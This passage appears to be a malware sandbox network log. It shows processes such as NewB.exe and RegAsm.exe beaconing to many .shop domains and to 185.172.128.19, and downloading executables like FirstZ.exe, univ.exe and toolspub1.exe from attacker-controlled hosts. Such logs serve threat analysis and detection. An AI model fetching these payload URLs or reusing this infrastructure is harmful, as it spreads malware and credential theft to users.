                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:43 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.19/FirstZ.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      GET /FirstZ.exe HTTP/1.1
                                                                                      Host: 185.172.128.19
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:47 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2665984
                                                                                      Last-Modified: Mon, 29 May 2023 20:39:56 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "64750d9c-28ae00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-fr
                                                                                      GET
                                                                                      http://5.42.67.23/dl.php?pub=mixeight
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      5.42.67.23:80
                                                                                      Request
                                                                                      GET /dl.php?pub=mixeight HTTP/1.1
                                                                                      Host: 5.42.67.23
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                      Pragma: public
                                                                                      Expires: 0
                                                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                                                      Cache-Control: private
                                                                                      Content-Disposition: attachment; filename="univ.exe";
                                                                                      Content-Transfer-Encoding: binary
                                                                                      Content-Length: 290304
                                                                                      Content-Type: application/octet-stream
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sofaprivateawarderysj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      104.21.95.16
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      172.67.169.40
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sofaprivateawarderysj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      172.67.169.40
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      104.21.95.16
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://sofaprivateawarderysj.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.95.16:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: sofaprivateawarderysj.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=5cape5m37a8i6tdhukl6mp0rse; expires=Sat, 07-Sep-2024 11:48:20 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bB4aYElEzkLc%2FvSiMfJd%2BdHN2gdnvXg0AW0g1sujIZH%2BgP5m%2FtRwnvpUC2lD5Fwl%2Bs2AAW4N%2FMS9PrSVeNVdH8QTJjZSl4ZVuWf1rgz7pJPEgGnxuVMMXHJuaHGtp6ywJy0UOse9mOJhRmITYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb80cfb1d16c-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      98.58.20.217.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      98.58.20.217.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      147.162.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      147.162.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      23.67.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      23.67.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      lineagelasserytailsd.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      Response
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      172.67.141.60
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      104.21.62.251
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://lineagelasserytailsd.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.141.60:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: lineagelasserytailsd.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=bdibkis6db9p2o2eqjutcnushj; expires=Sat, 07-Sep-2024 11:48:20 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRRvxivgSOcCjVmHZ1z9IClJJyK6ovkGtLJzrGlDS2AgXgSTTzeqBb%2FlH%2B9EtTRWKYUCaQxIqBAnQVROvvqu6uPk9pnpDRE1YmshFj39bp%2BO57AKZrY7Jayi%2BHPQnjkvKUQPCSSIbmWC2yJ%2B"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb836bc623ad-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      tendencyportionjsuk.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      Response
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      172.67.205.185
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      104.21.85.127
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://tendencyportionjsuk.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.205.185:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: tendencyportionjsuk.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=k575f85p93ljr88f0gbt4c4r7n; expires=Sat, 07-Sep-2024 11:48:21 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwbx8woa0Yf8L4L6dV3c4BWiFVHMT2yOny0cUbdSrNzNcaik%2BzPA1M3jdi4K4m4rMaRDbt6zE1nZYTD7v%2BVVRGe7fLlCft%2F6Ep%2FjG8jufD1pTcqAi0a7qqpZYT5FhutLAAh%2BZzC3CTyFxPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb866dcd643d-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      16.95.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      16.95.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      60.141.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      60.141.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      headraisepresidensu.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      Response
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      104.21.50.137
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      172.67.206.145
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://headraisepresidensu.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.50.137:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: headraisepresidensu.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=r18h1qo5cferb6ugh3dlftsldk; expires=Sat, 07-Sep-2024 11:48:21 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WniHbrVptuCVlT8Qs0xiH2CRxfJhMyifztzRHjOrmGFGx9OHwd3Fgs3x4zvAvua%2FLD4DCklTnMH6%2FRxLia6GwlMsSQgV48p3JG%2BAaUErbzX9kIJwbG32D216socBuhJ0JYN6Cd4K9YJNpMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb89a8de7713-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      file-file-host6.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      Response
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      5.101.50.183
                                                                                    • flag-us
                                                                                      DNS
                                                                                      file-file-host6.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      Response
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      5.101.50.183
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://file-file-host6.com/downloads/toolspub1.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      5.101.50.183:80
                                                                                      Request
                                                                                      GET /downloads/toolspub1.exe HTTP/1.1
                                                                                      Host: file-file-host6.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.2
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Content-Length: 229888
                                                                                      Connection: close
                                                                                      Last-Modified: Tue, 14 May 2024 18:01:02 GMT
                                                                                      ETag: "38200-6186dc8f1da04"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      appetitesallooonsj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      104.21.48.123
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      172.67.151.60
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://appetitesallooonsj.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.48.123:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: appetitesallooonsj.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=kj03q2h1q4j31ski1trmaq9ju6; expires=Sat, 07-Sep-2024 11:48:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1qR%2BxFhyUtTCtWq%2Br2Sdvi4OG2ZIEmRTOx9mmYCWWHA7Hy042rHYj%2BRaIDVRdrA3sLzC9UfR35eD4qFQ2XWJUGPw9Y%2Bi2Hr7nOO6kuV5OUe2HFa1QRpLOnAfPNEC2AdMmLQtS0FDYkvGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb938f3471d8-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      137.50.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      137.50.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      arkonsacom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      arkonsacom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      parrotflight.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      Response
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      172.67.187.204
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      104.21.84.71
                                                                                    • flag-us
                                                                                      GET
                                                                                      https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      172.67.187.204:443
                                                                                      Request
                                                                                      GET /4767d2e713f2021e8fe856e3ea638b58.exe HTTP/1.1
                                                                                      Host: parrotflight.com
                                                                                      Response
                                                                                      HTTP/1.1 307 Temporary Redirect
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Location: https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCzRFiPYhSiSaQ6LEhSDJ7i0neI%2FmMiz%2FggZy0Pg94xK1ClJIbEodYkf2aQlPCPy3uW8BIORKj0kLJrn7Ahwj2GJevfc%2FojTLWhsBVY5gCTNylx0PwdbZ2IYQjSrginaoXWV"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9becb971c6-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      minorittyeffeoos.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      Response
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      188.114.96.2
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      188.114.97.2
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://minorittyeffeoos.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      188.114.96.2:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: minorittyeffeoos.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=jgm13t3f21c49jv0so7sunmvlc; expires=Sat, 07-Sep-2024 11:48:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yg8ZTTWkLVMNElgowM%2F1kknDsHp05ureumhIMEE9%2BSq1R7ogZGteG%2Bl4vUV3RdeQKpGJuULOGt51g7Wuv0vZZci2FpBfhbG0T8Uv5mBicORNiMg8EtNeyxRPyzcNch9hDmmnbcE0%2B9Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9789786316-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      prideconstituiiosjk.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      Response
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      104.21.92.157
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      172.67.195.106
                                                                                    • flag-us
                                                                                      DNS
                                                                                      123.48.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      123.48.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      204.187.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      204.187.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      2.96.114.188.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      2.96.114.188.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      par21s19-in-f31e100net
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://prideconstituiiosjk.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.92.157:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: prideconstituiiosjk.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=70h1j165f60vm0fq1sopgu70sn; expires=Sat, 07-Sep-2024 11:48:24 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FjzT3cJGVdzUBvbialLw4Ant7DrYC4ps78OpP8iprnQLKc9O4qdtwUokkV82Ogyn%2BIlb%2B%2FlcIIrMuHvYCQ8l7rWh0pduVCBus2I2G3q9nt8fZD%2FOBXt1th9z5NO9StQVtQ5PV6SckzpQP8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9b6e856518-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      junglethomas.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      Response
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      104.21.92.190
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      172.67.197.33
                                                                                    • flag-us
                                                                                      GET
                                                                                      https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      104.21.92.190:443
                                                                                      Request
                                                                                      GET /ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe HTTP/1.1
                                                                                      Host: junglethomas.com
                                                                                      Connection: Keep-Alive
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:46 GMT
                                                                                      Content-Type: application/x-ms-dos-executable
                                                                                      Content-Length: 4308872
                                                                                      Connection: keep-alive
                                                                                      Last-Modified: Tue, 14 May 2024 17:40:54 GMT
                                                                                      Cache-Control: max-age=14400
                                                                                      CF-Cache-Status: MISS
                                                                                      Accept-Ranges: bytes
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUmRyu1NVuTIio7N9qeiz8W4m35O7wWUJB9GGZE6aD0UmX3b8WPa1zVQ%2BYkKnV7NT%2B7%2B1lqpW6JIf6JhbNdwCTWkw%2F6oLHEYR7Qxp32xBZmJ1Lq83VB%2BKEJzOuJ1nFhQ%2FY3v"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9e48db4182-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      157.92.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      157.92.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      190.92.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      190.92.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      dl.exe
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
